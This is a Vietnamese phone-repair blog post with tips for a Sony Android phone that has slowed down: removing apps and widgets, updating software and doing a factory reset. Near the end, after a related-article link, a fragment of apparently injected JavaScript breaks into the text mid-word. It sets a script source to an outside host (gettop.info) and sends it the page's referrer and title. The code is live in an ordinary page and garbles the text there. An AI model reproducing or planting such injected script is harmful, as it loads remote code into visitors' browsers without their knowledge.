Bỗng dưng Sony chạy chậm, bạn cần phải làm gì?

Ngày đăng: 3:36 chiều

Bỗng dưng Sony chạy chậm lại là hiện tượng thường xuất hiện sau khi bạn đã sử dụng máy được một thời gian. Vậy bạn cần làm gì để khắc phục tình trạng này?

Sony sau một thời gian sử dụng sẽ xuất hiện tình trạng ì ạch, xử lý thông tin chậm do tập tin rác được tích lũy lâu ngày sẽ làm ảnh hưởng đến hoạt động của hệ thống. Nếu bạn cũng đang gặp phải tình trạng Sony chạy chậm thì hãy áp dụng ngay những biện pháp sau đây:

Xóa bớt ứng dụng không cần thiết

Nhiều người dùng có thói quen tải nhiều ứng dụng về máy mà không sử dụng. Điều này vừa làm tiêu tốn nhiều tài nguyên của máy, vừa khiến ứng dụng chạy ngầm, tạo ra gánh nặng cho bộ vi xử lý của thiết bị. Do đó, tốt nhất bạn nên xóa bỏ các ứng dụng không cần thiết và tắt bỏ những ứng dụng mặc định chạy ngầm bằng cách Cài đặt => Tìm ứng dụng cài đặt cần xóa => Gỡ cài đặt hoặc bấm Vô hiệu hóa đối với những ứng dụng không xóa được.

Sony chạy chậm

Xóa bớt tiện ích

Tiện ích hay còn gọi là Widget quá nhiều sẽ máy phải hoạt động quá sức và không còn ổn định, mượt mà như trước. Vì vậy, bạn nên xóa bớt các ứng dụng này bằng cách nhấn giữ vào tiện ích và kéo vào ô Xóa/Ẩn hiện trên màn hình, hoặc bạn cũng có thể bấm giữ một khoảng trống của Homescreen để xem thêm các tùy chọn khác.

Cập nhật lên phiên bản phần mềm mới nhất

Cũng giống như các dòng máy Android khác, việc sử dụng hệ điều hành phiên bản cũ có thể làm Sony phát sinh ra nhiều lỗi. Vì vậy, tốt nhất bạn nên cập nhật phiên bản phần mềm mới nhất mỗi khi có thông báo hoặc có thể kiểm tra máy mình đã có thể update phiên bản mới hay chưa bằng cách vào Cài đặt => Thông tin thiết bị => Cập nhật phần mềm.

Sony chạy chậm

Khôi phục lại cài đặt gốc

Việc sử dụng Sony trong thời gian dài có thể làm phát sinh nhiều lỗi về phần mềm, khiến máy chạy chậm lại và thậm chí còn thể khiến bạn phải gặp phải các sự cố như đơ màn hình, mất nguồn đột ngột. Vì vậy, bạn có thể khôi phục cài đặt gốc để khắc phục tình trạng này. Tuy nhiên, trước khi khôi phục, bạn nhớ sao lưu lại các dữ liệu hiện tại của máy nhé!

Xem thêm: Xử lý nhanh Sony Z5 không nhận sạcs.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {

Tin liên quan

Thay mặt kính Samsung S6 Edge
Tháng Hai 14, 2017 leehieu